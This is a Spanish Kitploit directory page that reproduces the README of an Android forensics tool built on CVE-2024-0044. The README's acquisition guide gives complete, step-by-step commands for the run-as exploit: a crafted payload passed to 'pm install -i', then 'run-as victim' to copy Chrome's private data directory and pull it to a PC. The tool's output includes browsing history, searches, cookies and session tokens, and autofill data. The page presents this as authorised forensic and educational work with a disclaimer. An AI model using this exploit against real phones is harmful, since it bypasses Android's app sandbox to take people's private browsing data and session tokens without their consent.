Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Chrome-Forensic_CVE-2024-0044 — Una herramienta robusta de forense digital para extraer y analizar artefactos de Google Chrome desde dispositivos Android. | Kitploit
Herramientas/GitHubGitHub/jacktekno/chrome-forensic_cve-2024-0044
Seguridad AndroidAnálisis de VulnerabilidadesExplotaciónAnálisis ForenseForensia MóvilRecuperación de DatosForensia DigitalSeguridad MóvilAprendizaje y Educación

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubjacktekno/chrome-forensic_cve-2024-0044

Chrome-Forensic_CVE-2024-0044

Una herramienta robusta de forense digital para extraer y analizar artefactos de Google Chrome desde dispositivos Android.

Ver Repositorio
1hace 7 mesesAún no revisado

🔍 Chrome Forense - CVE-2024-0044

Version Python License Platform

Una herramienta robusta de forense digital para extraer y analizar artefactos de Google Chrome desde dispositivos Android

Características • Instalación • Uso • Documentación


👤 Información del Autor

Autor: JackTekno
GitHub: github.com/JackTekno


📋 Resumen

Esta herramienta utiliza la vulnerabilidad CVE-2024-0044 (Run-as) para eludir restricciones de permisos en dispositivos Android 12/13 no rooteados, permitiendo la extracción forense de datos de Google Chrome. La herramienta analiza bases de datos SQLite sin procesar y genera informes de análisis exhaustivos.

🔄 Flujo del Proceso

Diagrama de flujo de análisis forense

Flujo de trabajo completo de análisis forense desde la adquisición hasta la generación de informes


📊 Características y Salida

La herramienta genera un informe Excel completo (result_chrome_forensic.xlsx) con las siguientes hojas:


🛠️ Requisitos Previos

Requisitos de Hardware

  • 📱 Teléfono Android (Android 12/13)
  • 💻 PC (Linux/Windows/Mac)

Entorno Probado

  • 🐧 SO: Linux UOS 20 Professional

Requisitos de Software

  • 🐍 Python 3.x
  • 📲 ADB (Android Debug Bridge)
  • 📦 Archivo APK ficticio (ej., F-Droid.apk)

🚀 Instalación

  1. Clonar el repositorio

    root@kitploit:~
    git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
    cd Chrome-Forensic_CVE-2024-0044
    
  2. Instalar dependencias

    root@kitploit:~
    pip install -r requirements.txt
    

🔓 Guía de Adquisición de Datos

Paso 1: Preparar el Dispositivo

  1. Navega a Configuración → Acerca del teléfono
  2. Toca Número de compilación 7 veces para habilitar las Opciones de Desarrollador
  3. Ve a Configuración → Sistema → Opciones de Desarrollador
  4. Habilita Depuración USB
  5. Conecta el teléfono a la PC mediante USB y autoriza la conexión

Paso 2: Preparar el Exploit

root@kitploit:~
# Sube un APK ficticio a la carpeta temporal
adb push F-Droid.apk /data/local/tmp/base.apk

Paso 3: Encontrar el UID Objetivo

root@kitploit:~
adb shell pm list packages -U | grep com.android.chrome
# Ejemplo de salida: package:com.android.chrome uid:10129
# Anota el UID (ej., 10129)

Paso 4: Ejecutar el Exploit

⚠️ Reemplaza 10129 con el UID real de Chrome obtenido en el Paso 3

root@kitploit:~
adb shell

# Dentro del shell ADB:
PAYLOAD="@null
victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"

# Ejecuta el administrador de paquetes
pm install -i "$PAYLOAD" /data/local/tmp/base.apk

Paso 5: Extraer Datos

root@kitploit:~
# Todavía dentro del shell ADB
run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar

# Salir del shell ADB
exit

Paso 6: Transferir Datos a la PC

root@kitploit:~
adb pull /data/local/tmp/chrome.tar .

Paso 7: Descomprimir Datos

Extrae el archivo 'chrome.tar' en la carpeta del proyecto. No es necesario mover archivos manualmente. El script de Python encontrará automáticamente los archivos de base de datos dentro de las carpetas extraídas.

root@kitploit:~
tar -xf chrome.tar

💻 Uso

Ejecuta la herramienta de análisis forense:

root@kitploit:~
python3 chrome_forensic.py

La herramienta analizará los archivos de base de datos y generará result_chrome_forensic.xlsx en el mismo directorio.


⚖️ Aviso Legal

⚠️ IMPORTANTE: Esta herramienta está diseñada únicamente para fines educativos y de análisis forense autorizado.

  • Úsala solo en dispositivos que poseas o sobre los que tengas permiso explícito por escrito para analizar
  • El acceso no autorizado a dispositivos digitales puede violar las leyes de tu jurisdicción
  • Los autores no asumen ninguna responsabilidad por el uso indebido de esta herramienta

🤝 Contribuciones

¡Las contribuciones son bienvenidas! No dudes en enviar un Pull Request.


📄 Licencia

Este proyecto está licenciado bajo la Licencia Pública General de GNU v3.0. Consulta el archivo LICENSE para más detalles.


👤 Crédito

La prueba de concepto del método de adquisición fue resumida y compartida por Tinyhack.com.


Hecho con ❤️ por JackTekno

⭐ Dale una estrella a este repositorio • 🐛 Reportar un error • 💡 Solicitar una característica

Descargar herramienta
Nombre de la HojaDescripción
📖 Historial de NavegaciónLínea de tiempo detallada de URLs visitadas
📈 Analítica – Sitios PrincipalesRanking estadístico de los dominios más visitados
⚠️ ALERTAS – SospechososURLs marcadas automáticamente (hacking, drogas, contenido adulto)
📥 DescargasHistorial de descargas con rutas y tamaños de archivo
🔍 Términos de BúsquedaConsultas de búsqueda del usuario desde el omnibox/Google
🍪 Cookies y SesionesTokens de sesión y metadatos de cookies (cifrados en Hex)
✍️ Datos de AutocompletadoDatos de formularios guardados (nombres, direcciones, etc.)